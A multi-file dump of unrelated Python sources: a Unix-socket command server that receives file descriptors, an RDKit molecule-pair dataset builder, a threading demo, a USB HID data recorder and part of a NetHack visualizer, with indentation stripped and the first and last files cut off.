buffer.seek(0, os.SEEK_SET)
parser = self.parse_request(buffer, 0)
needed = next(parser)
with contextlib.ExitStack() as stack:
while needed:
# Prepare buffer for refill
parsed = buffer.tell()
offset += parsed
buffer.move(0, parsed, available - parsed)
buffer.seek(0, os.SEEK_SET)
available -= parsed
if needed > self.max_packet_size:
parser.throw(BufferTooSmallError(
needed,
self.max_packet_size,
offset=offset,
))
# Leave space for a trailing zero byte
size, ancdata, msg_flags, _ = request.recvmsg_into(
(memoryview(buffer)[available:-1],),
socket.CMSG_LEN(3 * SIZEOF_INT),
socket.MSG_CMSG_CLOEXEC,
)
available += size
# Ensure that a trailing zero byte exists
buffer[available] = 0
streams.extend(
stack.enter_context(stream)
for stream in self.parse_ancillary_data(ancdata, ["r", "w", "w"])
)
if msg_flags & socket.MSG_CTRUNC:
raise ProtocolError("Truncated ancillary data")
try:
needed = parser.send((buffer, available))
except StopIteration as e:
_, _, (argv, environ) = e.value
if buffer.tell() < available:
raise ProtocolError(
"{} byte(s) left over after parsing"
.format(available - buffer.tell())
)
needed = 0
except BaseParseError as e:
raise e.with_offset(offset + buffer.tell())
else:
# Remote end closed/shut down writing
if needed > 0 and size == 0:
# Raise an error in the parser to produce an error with
# proper message
parser.throw(UnexpectedEOFError(
needed,
available,
offset=offset + buffer.tell(),
))
if not streams:
raise ProtocolError("No file descriptors received")
if len(streams) != 3:
raise ProtocolError(
"Expected to receive exactly 3 file descriptors"
)
stdin = ensure_stream_readable(streams[0], 'stdin')
stdout = ensure_stream_writable(streams[1], 'stdout')
stderr = ensure_stream_writable(streams[2], 'stderr')
# Clear the stack
stack.pop_all()
return (stdin, stdout, stderr), argv, environ
@staticmethod
def parse_ancillary_data(
ancdata: Container[Tuple[int, int, bytes]],
expected_fd_modes: Sequence[str],
) -> List[TextIO]:
"""
Open streams for file descriptors received via :func:`socket.recvmsg`
ancillary data.
:param ancdata:
:param expected_fd_modes: a sequence of modes in which the fds should be opened
:return:
"""
fds = array.array("i")
streams = []
with contextlib.ExitStack() as stack:
truncated = False
for cmsg_level, cmsg_type, cmsg_data in ancdata:
if (
cmsg_level == socket.SOL_SOCKET
and cmsg_type == socket.SCM_RIGHTS
):
end = len(cmsg_data) - (len(cmsg_data) % fds.itemsize)
truncated |= end != len(cmsg_data)
fds.frombytes(cmsg_data[:end])
else:
logger.warning(
"Received unexpected control message: level=%d type=%d",
cmsg_level, cmsg_type,
)
# Ensure that file descriptors get closed on error
for fd in fds:
stack.callback(_try_close, fd)
if truncated:
raise ProtocolError(
"Received truncated file descriptor. "
"SCM_RIGHTS control message data must be an multiple of "
"sizeof(int) = {}".format(fds.itemsize)
)
for fd, fd_mode in zip_left(fds, expected_fd_modes):
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
if flags & os.O_ACCMODE == os.O_RDONLY:
mode = "r"
elif flags & os.O_ACCMODE == os.O_WRONLY:
mode = "w"
elif flags & os.O_ACCMODE == os.O_RDWR:
# the stdout/stderr buffers can possibly be in RW mode,
# however the buffer used by `sys.stdout` is usually opened in
# write-only mode by python.
# in fact, opening this in `r+` (i.e. read-write mode) and using buffering
# causes open() to refuse operation because the buffer is not seekable.
# See https://bugs.python.org/issue20074#msg207012 and the related discussion
# for some details on the core developers' philosophy on this.
mode = fd_mode or "w"
else:
os.close(fd)
logger.warning("Unknown fd ACCMODE %x for fd %d", flags & os.O_ACCMODE, fd)
continue
# noinspection PyTypeChecker
try:
stream: TextIO = os.fdopen(fd, mode, closefd=True)
except io.UnsupportedOperation as e:
raise RuntimeError(
f"Unable to open fd {fd} ({(len(streams))} already parsed, {mode=})"
) from e
streams.append(stream)
stack.pop_all()
return streams
@staticmethod
def parse_int(
data: mmap.mmap,
size: int,
element: str = "int",
) -> Parser[int]:
"""Try to parse a C int"""
need = SIZEOF_INT
if data.tell() + need > size:
try:
data, size = yield need
except BaseParseError as e:
raise e.with_element(element)
value = struct.unpack("=i", data.read(need))[0]
return data, size, value
@staticmethod
def parse_string(
data: mmap.mmap,
size: int,
element: str = "string"
) -> Parser[str]:
"""Try to parse a zero-terminated C string"""
need = 1
while True:
if data.tell() + need > size:
try:
data, size = yield need
except BaseParseError as e:
raise e.with_element(element)
# This is safe, because we ensure that underlying buffer is always
# zero-terminated
start = data.tell()
end = data.find(b'\x00', start, size)
if end != -1:
arg = data[start:end]
data.seek(end + 1, os.SEEK_SET)
return data, size, arg
else:
need = size - start + 1
@classmethod
def parse_request(
cls,
data: mmap.mmap,
size: int,
) -> Parser[Tuple[List[bytes], Dict[bytes, bytes]]]:
# Parse number of arguments
element = "argc"
data, size, argc = yield from cls.parse_int(data, size, element)
if argc < 0:
raise ParseError("Negative argc: " + str(argc), element=element)
# Parse arguments
argv = []
for i in range(argc):
element = "argv[{:d}]".format(i)
data, size, arg = yield from cls.parse_string(data, size, element)
argv.append(arg)
# Parse number of environment variables
element = "envc"
data, size, envc = yield from cls.parse_int(data, size, element)
if envc < 0:
raise ParseError("Negative envc: " + str(envc), element=element)
# Parse environment variables
environ = {}
for i in range(envc):
element = "environ[{}]".format(i)
data, size, env = yield from cls.parse_string(data, size, element)
name, sep, value = env.partition(b'=')
if not sep:
raise ParseError(
"No equal sign in environment variable: " + repr(name),
element=element,
)
environ[name] = value
return data, size, (argv, environ)
def _handle_shutdown_signal(self, signo, _frame):
logger.error("Received signal %d. Shutting down.", signo)
# shutdown blocks until the server is stopped, therefore we must use a
# separate thread, otherwise there will be deadlock
threading.Thread(name='shutdown', target=self.shutdown).start()
def serve_forever(self, poll_interval=0.5):
logger.info("Starting server loop")
with install_handler(
(signal.SIGHUP, signal.SIGINT, signal.SIGTERM),
self._handle_shutdown_signal
):
super().serve_forever(poll_interval)
def _process(
self,
stdin: TextIO, stdout: TextIO, stderr: TextIO,
args: Sequence[bytes], env: Dict[bytes, bytes]
) -> int:
decoded_args = [decode(a) for a in args]
parsed_args = self.parser.parse_args(decoded_args[1:])
return dispatch_commands(
args=parsed_args,
context=Context(
stdin=stdin, stdout=stdout, stderr=stderr,
environ={decode(k): decode(v) for k, v in env.items()},
environb=env,
),
engine=self.engine,
)
def decode(x: bytes) -> str:
"""Decode a string like done in `os._createenviron` (hard-coding utf-8)"""
return x.decode("utf-8", errors="surrogateescape")
def ensure_stream_readable(stream, stream_desc: str):
if 'r' not in stream.mode:
raise ProtocolError(
f"stream {stream_desc} is not readable ({stream.mode=})"
)
return stream
def ensure_stream_writable(stream, stream_desc: str):
is_writable = bool({'w', '+'} & set(stream.mode))
if not is_writable:
raise ProtocolError(
f"Stream {stream_desc} is not writable ({stream.mode=})"
)
return stream
def _try_close(fd):
try:
os.close(fd)
except OSError as e:
logger.error("Problem closing file descriptor", exc_info=e)
def zip_left(left, right, rfill=None):
return zip(left, chain(right, repeat(rfill)))
|
pt_build_optfile.py
|
from rdkit import Chem
from rdkit import DataStructs
from random import shuffle
import numpy as np
import time
from rdkit.Chem import Descriptors
from tqdm import tqdm
from multiprocessing import Process
import os
import subprocess
def get_(similarity_lib, scale, to_file=False, n_dev=10000, show=True, ids=None):
if type(similarity_lib) == str:
with open(similarity_lib,'r') as f:
libm = []
libs = []
for l in f:
m, sm = l.strip().split(':')
libm.append(m)
libs.append(sm.split(','))
else:
libm = [i[0] for i in similarity_lib]
libs = [i[1] for i in similarity_lib]
libmq = []
print('cal ref QEDs')
with tqdm(total=len(libm)) as ref_pbar:
for i in libm:
libmq.append(Descriptors.qed(Chem.MolFromSmiles(i)))
if show:
ref_pbar.update()
libsq = []
libss = []
print('cal candidate QEDs')
with tqdm(total=len(libs)) as cdd_pbar:
for lidx,i in enumerate(libs):
temp_ = []
k = 0
tp = libm[lidx]
while len(temp_)<scale and k<len(i):
if i[k] != tp:
temp_.append(i[k])
k += 1
libss.append(temp_)
libsq.append([Descriptors.qed(Chem.MolFromSmiles(j)) for j in temp_])
if show:
cdd_pbar.update()
opt = []
optv = []
print('build pair')
with tqdm(total=len(libm)) as bd_pbar:
for midx in range(len(libm)):
diff = [abs(libmq[midx]-libsq[midx][cidx]) for cidx in range(len(libsq[midx]))]
sel = np.argmax(diff)
optv.append(max(diff))
if libmq[midx]<libsq[midx][sel]:
opt.append([libm[midx], libss[midx][sel]])
else:
opt.append([libss[midx][sel], libm[midx]])
if show:
bd_pbar.update()
print('remove repeats')
opt = ['&'.join(i) for i in opt]
opt = list(set(opt))
opt = [i.split('&') for i in opt]
if to_file:
with open(to_file,'w') as f:
for r in opt:
f.write(','.join([str(i) for i in r])+'\n')
simv = []
print('cal pair similarity')
with tqdm(total=len(libm)) as sv_pbar:
for r in opt:
simv.append(DataStructs.TanimotoSimilarity(Chem.RDKFingerprint(Chem.MolFromSmiles(r[0])),Chem.RDKFingerprint(Chem.MolFromSmiles(r[1]))))
if show:
sv_pbar.update()
optv = np.mean(optv)
simv = np.mean(simv)
print('split data')
idx= list(range(len(opt)))
shuffle(idx)
train_idx = idx[:-10000]
dev_idx = idx[-10000:]
train_opt = [opt[i] for i in train_idx]
dev_opt = [opt[i] for i in dev_idx]
if ids == None:
return train_opt, dev_opt, optv, simv
else:
with open('train_subprocess_{0}.tsv'.format(ids), 'w') as f:
for r in train_opt:
f.write('{0}\t{1}\n'.format(r[0], r[1]))
with open('dev_subprocess_{0}.tsv'.format(ids), 'w') as f:
for r in dev_opt:
f.write('{0}\t{1}\n'.format(r[0], r[1]))
with open('rec_subprocess_{0}'.format(ids),'w') as f:
f.write('{0}\n'.format(optv))
f.write('{0}\n'.format(simv))
def get_s(similarity_lib, scale, to_file=False, n_dev=10000, show=True, ids=None):
if type(similarity_lib) == str:
with open(similarity_lib,'r') as f:
libm = []
libs = []
for l in f:
m, sm = l.strip().split(':')
libm.append(m)
libs.append(sm.split(','))
else:
libm = [i[0] for i in similarity_lib]
libs = [i[1] for i in similarity_lib]
libmq = []
libmfp = []
print('cal ref QEDs')
with tqdm(total=len(libm)) as ref_pbar:
for i in libm:
rmol = Chem.MolFromSmiles(i)
libmfp.append(Chem.RDKFingerprint(rmol))
libmq.append(Descriptors.qed(rmol))
if show:
ref_pbar.update()
opt = []
optv = []
simv = []
print('build pair')
with tqdm(total=len(libm)) as bd_pbar:
for midx in range(len(libm)):
rfp = libmfp[midx]
rq = libmq[midx]
max_d = 0
csmi = 'C1CCCCC1'
sim_v = 0
for cdd in libs[midx]:
cmol = Chem.MolFromSmiles(cdd)
cfp = Chem.RDKFingerprint(cmol)
sim = DataStructs.TanimotoSimilarity(rfp, cfp)
if sim<scale[1] and sim>scale[0]:
cq = Descriptors.qed(cmol)
diff = cq - rq
if diff > max_d:
csmi = cdd
max_d = diff
sim_v = sim
if max_d > 0:
opt.append([libm[midx], csmi])
optv.append(max_d)
simv.append(sim_v)
if show:
bd_pbar.update()
if to_file:
with open(to_file,'w') as f:
for r in opt:
f.write(','.join([str(i) for i in r])+'\n')
print('split data')
idx= list(range(len(opt)))
shuffle(idx)
if len(opt)<n_dev:
n = len(str(len(opt)))-1
kn = '1'+'0'*n
kn = int(int(kn)/10)
else:
kn = n_dev
train_idx = idx[:-kn]
dev_idx = idx[-kn:]
train_opt = [opt[i] for i in train_idx]
dev_opt = [opt[i] for i in dev_idx]
if ids == None:
return train_opt, dev_opt, optv, simv
else:
with open('train_subprocess_{0}.tsv'.format(ids), 'w') as f:
for r in train_opt:
f.write('{0}\t{1}\n'.format(r[0], r[1]))
with open('dev_subprocess_{0}.tsv'.format(ids), 'w') as f:
for r in dev_opt:
f.write('{0}\t{1}\n'.format(r[0], r[1]))
optv = np.array(optv)
simv = np.array(simv)
np.save('simv_subprocess_{0}.npy'.format(ids), simv)
np.save('optv_subprocess_{0}.npy'.format(ids), optv)
def multi(similarity_lib, n_jobs, scale, n_dev=10000):
lib = []
with open(similarity_lib,'r') as f:
for l in f:
m, sm = l.strip().split(':')
lib.append([m, sm.split(',')])
n_jobs = max(n_jobs, 1)
recn_per_job = round(len(lib)/n_jobs)
rec_lists = [lib[i*recn_per_job:(i+1)*recn_per_job] for i in range(n_jobs-1)]
rec_lists.append(lib[(n_jobs-1)*recn_per_job:])
n_dev = int(n_dev/n_jobs)
sub_process = []
for sp in range(n_jobs):
sub_process.append(Process(target=get_s, args=(rec_lists[sp], scale, False, n_dev, False, sp)))
for sp in sub_process:
sp.start()
for sp in sub_process:
sp.join()
# merge files and remove temporary files
train_opt = []
dev_opt = []
simv = []
optv = []
for spf in range(n_jobs):
with open('train_subprocess_{0}.tsv'.format(spf)) as f:
train_sp = f.readlines()
train_sp = [i.strip().split('\t') for i in train_sp]
train_opt += train_sp
with open('dev_subprocess_{0}.tsv'.format(spf)) as f:
dev_sp = f.readlines()
dev_sp = [i.strip().split('\t') for i in dev_sp]
dev_opt += dev_sp
simv_sp = np.load('simv_subprocess_{0}.npy'.format(spf))
simv += list(simv_sp)
optv_sp = np.load('optv_subprocess_{0}.npy'.format(spf))
optv += list(optv_sp)
subprocess.call('rm train_subprocess_{0}.tsv'.format(spf), shell=True)
subprocess.call('rm dev_subprocess_{0}.tsv'.format(spf), shell=True)
subprocess.call('rm simv_subprocess_{0}.npy'.format(spf), shell=True)
subprocess.call('rm optv_subprocess_{0}.npy'.format(spf), shell=True)
return train_opt, dev_opt, optv, simv
|
threading_queue.py
|
import threading
import time
from queue import Queue
def job(l, q):
for i in range(len(l)):
l[i] = l[i] ** 2
q.put(l)
def multithreading():
q = Queue()
threads = []
data = [[1, 2, 3], [3, 2, 4], [4, 1, 3], [5, 5, 5]]
for i in range(4):
t = threading.Thread(target=job, args=(data[i], q))
t.start()
threads.append(t)
for thread in threads:
thread.join()
results = []
for _ in range(4):
results.append(q.get())
print(results)
if __name__ == '__main__':
multithreading()
|
HID_recorder.py
|
#!/usr/bin/python3
# C:\Work\Python\HID_Util\src\HID_recorder.py
from binascii import hexlify
import sys
import argparse
import threading
from time import perf_counter as timer
import include_dll_path
import hid
import os
from string_date_time import get_date_time
# BOARD_TYPE_MAIN = 0,
# BOARD_TYPE_JOYSTICKS = 1,
# BOARD_TYPE_TOOLS_MASTER = 2,
# BOARD_TYPE_STATION = 3,
# BOARD_TYPE_SUITE2PRIPH = 4,
# BOARD_TYPE_TOOLS_SLAVE = 5,
# BOARD_TYPE_GBU = 6,
# BOARD_TYPE_LAP = 7
# VENDOR_ID = 0x24b3 # Simbionix
# PRODUCT_ID = 0x1005 # Simbionix MSP430 Controller
# USB\VID_2047&PID_0302&REV_0200
VENDOR_ID = 0x2047 # Texas Instruments
PRODUCT_ID = 0x0302 # Joystick.
PRODUCT_ID_JOYSTICK = 0x0302 # Joystick.
PRODUCT_ID_ROUTER = 0x0301 # Router
PRODUCT_ID_STATION = 0x0304
PRODUCT_ID_LAP_NEW_CAMERA = 0x2005
# 2021_01_24
# USB\VID_24B3&PID_2005&REV_0200
# 0x24B3 = 9395
# 0x2005 = 8197
# VENDOR_ID = 0x24b3 # Simbionix
# PRODUCT_ID = 0x2005 # LAP_NEW_CAMERA.
PRODUCT_ID_types = {
0x0302: "BOARD_TYPE: Joystick/Universal",
0x0301: "BOARD_TYPE: Router/Main",
0x0304: "BOARD_TYPE: STATION",
0x0303: "BOARD_TYPE: TOOLS_MASTER",
0x0305: "BOARD_TYPE: SUITE2PRIPH",
0x0306: "BOARD_TYPE: TOOLS_SLAVE",
0x0307: "BOARD_TYPE: GBU",
0x0308: "BOARD_TYPE: LAP camera",
0x2005: "BOARD_TYPE: PRODUCT_ID_LAP_NEW_CAMERA", #board type is enforced in FW (descriptors.h)
0x1965: "yosi"
}
# FILE1_PATH = "log\hid_log.csv"
FILE1_PATH = "log\hid_" # log.csv"
start_date_time = get_date_time()
FILE1_PATH = FILE1_PATH + start_date_time + ".csv"
print("Recording result at: ", FILE1_PATH, "\n")
if not os.path.exists('log'):
os.makedirs('log')
# file1 = None
# open recording log file:
# file1 = open("C:\Work\Python\HID_Util\src\log\log.csv","w")
file1 = open(FILE1_PATH,"w")
# file1 = open("log\hid_log.csv","w")
hid_util_fault = 0
print_every = 0
READ_SIZE = 64 # The size of the packet
READ_TIMEOUT = 2 # 2ms
WRITE_DATA = bytes.fromhex("3f3ebb00b127ff00ff00ff00ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
DEFAULT_WRITE_DATA = WRITE_DATA
WRITE_DATA_CMD_I = bytes.fromhex("3f3ebb00b127ff00ff00ff0049ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# start streaming command:
# 3f 04 82 00 00
WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
WRITE_DATA_CMD_START_ = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# start streaming command for station 0x303:
WRITE_DATA_CMD_START_0x304 = bytes.fromhex("3f048d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# Get Board Type command:
# 01h 00h 00h 01h
WRITE_DATA_CMD_GET_BOARD_TYPE = bytes.fromhex("3f040100000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
#.........................................................##........................................
WRITE_DATA_CMD_S = bytes.fromhex("3f3ebb00b127ff00ff00ff0053ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# 'A' - keep Alive + fast BLE update (every 20 msec)
WRITE_DATA_CMD_A = bytes.fromhex("3f3ebb00b127ff00ff00ff0041ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# moderate BLE update rate every 50 mSec by 'M' command
WRITE_DATA_CMD_M = bytes.fromhex("3f3ebb00b127ff00ff00ff004dff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# set_BSL_mode
# WRITE_DATA_CMD_B = bytes.fromhex("3f3eaa00b127ff00ff00ff004dff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
#0xAA Run BSL
WRITE_DATA_CMD_B = bytes.fromhex("3f04aa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
SLEEP_AMOUNT = 0.002 # Read from HID every 2 milliseconds
PRINT_TIME = 1.0 # Print every 1 second
# PRINT_TIME = 0.5 # Print every 0.5 second
#PRINT_TIME = 2 # Print every 2 second
START_INDEX = 2 + 4 # Ignore the first two bytes, then skip the version (4 bytes)
# ANALOG_INDEX_LIST = list(range(START_INDEX + 2, START_INDEX + 4 * 2 + 1, 2)) + [START_INDEX + 6 * 2,]
ANALOG_INDEX_LIST = list(range(START_INDEX + 2, START_INDEX + 8 * 2 + 1, 2))
print("ANALOG_INDEX_LIST=",ANALOG_INDEX_LIST)
# ANALOG_INDEX_LIST= [8, 10, 12, 14, 16, 18, 20, 22]
LAP_ANALOG_INDEX_LIST = list(range(2,8 * 2 + 1, 2))
COUNTER_INDEX = 2 + 22 + 18 # Ignore the first two bytes, then skip XData1 (22 bytes) and OverSample (==XDataSlave1; 18 bytes)
CMOS_INDEX = 2 + 2 # maybe + 4???
# 0 1 2 3 4 5 6 7 8 9 1011
# Received data: b'3f26 00 00 00 00 0674fc41 3f4efc70 0033a4513c5a0101210001000000650000000000000000000000167f070dd7aee89baff63fedcfcccb763acf041b00000010'
# TORQUE INSERTION
# global variables
special_cmd = 0
def gui_loop(device):
do_print = True
print_time = 0.0
time = timer()
handle_time = timer()
write_time_capture = timer()
skip_write = 0
prev_counter = 0
send_stream_request_command_once = 1
# cnt = None
# prev_cnt = None
# value = None
global special_cmd
# global print_flag
while True:
# Reset the counter
if (do_print):
print_time = timer()
# Write to the device
# if send_stream_request_command_once == 1:
# send_stream_request_command_once = 0
# if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
# print("enforce streaming of data with command 0x82"
# if device is attached enforce streaming of data.
# device.write(WRITE_DATA_CMD_START)
if special_cmd == 'I':
if PRODUCT_ID == PRODUCT_ID_STATION:
WRITE_DATA = WRITE_DATA_CMD_START_0x304
else:
WRITE_DATA = WRITE_DATA_CMD_START
device.write(WRITE_DATA)
print("special_cmd Start")
special_cmd = 0
# elif special_cmd == 'S':
# WRITE_DATA = WRITE_DATA_CMD_GET_BOARD_TYPE
# device.write(WRITE_DATA)
# print("special_cmd CMD_GET_BOARD_TYPE")
# # print_flag = 1
# special_cmd = 0
# elif special_cmd == 'A':
# WRITE_DATA = WRITE_DATA_CMD_A
# print("special_cmd A -> keep Alive + fast BLE update (every 20 msec)")
# special_cmd = 0
# elif special_cmd == 'M':
# WRITE_DATA = WRITE_DATA_CMD_M
# print("special_cmd M -> moderate BLE update rate every 50 mSec")
# special_cmd = 0
# elif special_cmd == 'B':
# WRITE_DATA = WRITE_DATA_CMD_B
# device.write(WRITE_DATA)
# print("special_cmd B -> set_BSL_mode --- this will stop HID communication with this GUI")
# special_cmd = 0
# else:
# WRITE_DATA = DEFAULT_WRITE_DATA
cycle_time = timer() - time
# print("cycle timer: %.10f" % cycle_time)
# If not enough time has passed, sleep for SLEEP_AMOUNT seconds
sleep_time = SLEEP_AMOUNT - (cycle_time)
# Measure the time
time = timer()
# print(" ")
# Read the packet from the device
value = device.read(READ_SIZE, timeout=READ_TIMEOUT)
# Update the GUI
if len(value) >= READ_SIZE:
# save into file:
analog = [(int(value[i + 1]) << 8) + int(value[i]) for i in LAP_ANALOG_INDEX_LIST]
channel_0 = analog[0]
channel_1 = analog[1]
channel_2 = analog[2]
channel_3 = analog[3]
channel_4 = analog[4]
counter = (int(value[COUNTER_INDEX + 1]) << 8) + int(value[COUNTER_INDEX])
count_dif = counter - prev_counter
global file1
#if count_dif > 1 :
# L = [ str(counter),", ", str(clicker_analog), ", " , str(count_dif), " <<<<<--- " ,"\n" ]
#else:
# L = [ str(counter),", ", str(clicker_analog), ", " , str(count_dif), "\n" ]
L = [ str(channel_0),", ", str(channel_1), ", " , str(channel_2),", " , str(channel_3),", " , str(channel_4), "\n" ]
file1.writelines(L)
# handler(value, do_print=do_print)
# print("Received data: %s" % hexlify(value))
Handler_Called = (timer() - handle_time)
if Handler_Called > 0.002 :
# if Handler_Called > 0.02 :
#print("handler called: %.6f" % Handler_Called)
global print_every
print_every = print_every + 1
if print_every >= 500:
print_every = 0
print("time:", time, end="")
print(" Received data: %s" % hexlify(value))
# print("time: %.6f" % time)
handle_time = timer()
prev_counter = counter
# Update the do_print flag
do_print = (timer() - print_time) >= PRINT_TIME
def handler(value, do_print=False):
if do_print:
print("Received data: %s" % hexlify(value))
return # do without gui
PROGRESS_BAR_LEN = 300
LONG_PROGRESS_BAR_LEN = 590
def init_parser():
parser = argparse.ArgumentParser(
description="Read the HID data from target board.\nIf no argument is given, the program exits."
)
parser.add_argument(
"-v", "--vendor",
dest="vendor_id",
metavar="VENDOR_ID",
type=int,
nargs=1,
required=False,
help="connects to the device with the vendor ID"
)
parser.add_argument(
"-p", "--product",
dest="product_id",
metavar="PRODUCT_ID",
type=int,
nargs=1,
required=False,
help="connects to the device with that product ID"
)
parser.add_argument(
"-a", "--path",
dest="path",
metavar="PATH",
type=str,
nargs=1,
required=False,
help="connects to the device with the given path"
)
return parser
def main():
global VENDOR_ID
global PRODUCT_ID
PATH = None
# open recording log file:
# file1 = open("C:\Work\Python\HID_Util\src\log\log2.txt","w")
# Parse the command line arguments
parser = init_parser()
args = parser.parse_args(sys.argv[1:])
# Initialize the flags according from the command line arguments
avail_vid = args.vendor_id != None
avail_pid = args.product_id != None
avail_path = args.path != None
id_mode = avail_pid and avail_vid
path_mode = avail_path
default_mode = (not avail_vid) and (not avail_pid) and (not avail_path)
if (path_mode and (avail_pid or avail_vid)):
print("The path argument can't be mixed with the ID arguments")
return
if ((not avail_path) and ((avail_pid and (not avail_vid)) or ((not avail_pid) and avail_vid))):
print("Both the product ID and the vendor ID must be given as arguments")
return
if (default_mode):
print("No arguments were given, defaulting to:")
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
id_mode = True
elif (id_mode):
VENDOR_ID = args.vendor_id[0]
PRODUCT_ID = args.product_id[0] #run over with 772 == 0x304
elif (path_mode):
PATH = args.path[0]
else:
raise NotImplementedError
device = None
try:
if (id_mode):
try:
print("try with default device:")
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
except:
print("wrong ID")
print(" ")
# 0x24B3 = 9395
# 0x2005 = 8197
for n in range(7):
if device is None:
try:
# print("try with other device")
VENDOR_ID = 0x24b3 # Simbionix
PRODUCT_ID = 0x2000 + n # LAP_NEW_CAMERA. is 0x2005
# print("VID = %X PID = %X " % VENDOR_ID, PRODUCT_ID)
print("try with PID = %X " % PRODUCT_ID)
# print("PRODUCT_ID = %X" % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
# device = hid.Device(vid=0x24B3, pid=0x2005)
# print("success vid=0x24B3, pid=0x2005 !!")
except:
print("wrong ID2")
# VENDOR_ID = 2047
# PRODUCT_ID = 304
# 0x2047 = 8263
# 0x304 = 772
# 0x0301 // Product ID (PID) - base for Prime products family
for n in range(len(PRODUCT_ID_types)):
if device is None:
try:
# print("try with other device")
VENDOR_ID = 0x2047 # Texas Instrument
PRODUCT_ID = 0x301 + n # BOARD_TYPE_MAIN is 0x301
# print("VID = %X PID = %X " % VENDOR_ID, PRODUCT_ID)
print("try with PID = %X " % PRODUCT_ID)
# print("PRODUCT_ID = %X" % PRODUCT_ID)
device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID)
# device = hid.Device(vid=0x24B3, pid=0x2005)
# print("success vid=0x24B3, pid=0x2005 !!")
except:
print("wrong ID2")
if device is None:
print("no device attached")
else:
print("VENDOR_ID = %X" % VENDOR_ID)
print("PRODUCT_ID = %X" % PRODUCT_ID)
if PRODUCT_ID in PRODUCT_ID_types:
print(PRODUCT_ID_types[PRODUCT_ID])
global special_cmd
if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
special_cmd = 'I'
elif (path_mode):
device = hid.Device(path=PATH)
else:
raise NotImplementedError
print(" ")
print(" --------------------------------------")
print(" Please press <Enter> to stop recording")
print(" --------------------------------------")
print(" ")
# Create thread that calls
threading.Thread(target=gui_loop, args=(device,), daemon=True).start()
input()
print("Recording start: ", start_date_time)
print("Recording end : ", get_date_time())
print("\n","Recording result at: ", FILE1_PATH)
finally:
global file1
file1.close() #to change file access modes
if device != None:
device.close()
if __name__ == "__main__":
main()
|
visualizer.py
|
import multiprocessing
import queue
import time
import cv2
import nle.nethack as nh
import numpy as np
from PIL import Image, ImageDraw, ImageFont
# avoid importing agent modules here, because it makes agent reloading less reliable
from .scopes import DrawTilesScope, DebugLogScope
from .utils import put_text, draw_frame, draw_grid, FONT_SIZE, VideoWriter
HISTORY_SIZE = 13
RENDERS_HISTORY_SIZE = 128
class Visualizer:
def __init__(self, env, tileset_path='/tilesets/3.6.1tiles32.png', tile_size=32,
start_visualize=None, show=False, output_dir=None, frame_skipping=None, output_video_path=None):
self.env = env
self.tile_size = tile_size
self._window_name = 'NetHackVis'
self.show = show
self.start_visualize = start_visualize
self.output_dir = output_dir
self.last_obs = None
self.tileset = cv2.imread(tileset_path)[..., ::-1]
if self.tileset is None:
raise FileNotFoundError(f'Tileset {tileset_path} not found')
if self.tileset.shape[0] % tile_size != 0 or self.tileset.shape[1] % tile_size != 0:
raise ValueError("Tileset and tile_size doesn't match modulo")
h = self.tileset.shape[0] // tile_size
w = self.tileset.shape[1] // tile_size
tiles = []
for y in range(h):
y *= tile_size
for x in range(w):
x *= tile_size
tiles.append(self.tileset[y:y + tile_size, x:x + tile_size])
self.tileset = np.array(tiles)
# note that this file is a symlink (acutall file is in the docker container)
from .glyph2tile import glyph2tile
self.glyph2tile = np.array(glyph2tile)
if self.show:
print('Read tileset of size:', self.tileset.shape)
self.action_history = list()
self.message_history = list()
self.popup_history = list()
self.drawers = []
self.log_messages = list()
self.log_messages_history = list()
self.frame_skipping = frame_skipping
self.frame_counter = -1
self._force_next_frame = False
self._dynamic_frame_skipping_exp = lambda: min(0.95, 1 - 1 / (self.env.step_count + 1))
self._dynamic_frame_skipping_render_time = 0
self._dynamic_frame_skipping_agent_time = 1e-6
self._dynamic_frame_skipping_threshold = 0.3 # for render_time / agent_time
self._dynamic_frame_skipping_last_end_time = None
self.total_time = 0
self.renders_history = None
if not self.show and output_video_path is None:
assert output_dir is not None
self.renders_history = queue.deque(maxlen=RENDERS_HISTORY_SIZE)
self.output_dir = output_dir
self.output_dir.mkdir(exist_ok=True, parents=True)
self._start_display_thread()
self.last_obs = None
self.video_writer = None
if output_video_path is not None:
self.video_writer = VideoWriter(output_video_path, fps=10)
self.tty_downscale = 1.0 # consider changing for better performance
self.font = ImageFont.truetype("/usr/share/fonts/truetype/dejavu/DejaVuSansMono.ttf",
int(26 * self.tty_downscale))
def debug_tiles(self, *args, **kwargs):
return DrawTilesScope(self, *args, **kwargs)
def debug_log(self, txt, color):
return DebugLogScope(self, txt, color)
def step(self, obs, action):
self.last_obs = obs
self.action_history.append(action)
self._update_log_message_history()
self._update_message_history()
self._update_popup_history()
if self.video_writer is not None:
frame = self._render()
if frame is not None:
self.video_writer.write(frame)
def render(self):
if self.video_writer is not None:
return False
self.frame_counter += 1
render_start_time = None
try:
t = time.time()
frame = self._render()
if frame is None:
return False
render_start_time = t
if self.show:
